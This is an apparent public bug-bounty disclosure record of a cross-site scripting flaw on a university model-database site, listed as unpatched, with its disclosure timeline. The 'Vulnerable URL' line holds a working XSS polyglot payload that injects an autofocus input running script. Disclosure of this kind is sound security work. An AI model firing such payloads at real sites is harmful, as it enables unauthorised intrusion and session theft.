Vulnerable URL:
https://hepmdb.soton.ac.uk/index.php?mod=/%3C!%27/*!%22/*!\%27/*\%22/*--!%3E%3C/Title/%3C/script/%3E%3CInput/Autofocus/*/Onfocus=confirm`XSSPOSED`%20//%3E%3CSvg%3E&act;=showmodel&id;=
Details:
Description |
Value |
Patched: |
No |
Latest check for patch: |
29.09.2017 |
Vulnerability type: |
XSS |
Vulnerability status: |
Publicly disclosed |
Alexa Rank |
Unknown / Not calculated |
VIP website status: |
No |
Check hepmdb.soton.ac.uk SSL connection: |
(Grade: B) |
Coordinated Disclosure Timeline:
Description |
Value |
Vulnerability submitted via Open Bug Bounty |
6 July, 2017 18:55 GMT |
Vulnerability existence verified and confirmed |
7 July, 2017 05:42 GMT |
Generic security notifications sent to website owner |
7 July, 2017 05:42 GMT |
Vulnerability details disclosed by researcher |
29 September, 2017 06:30 GMT |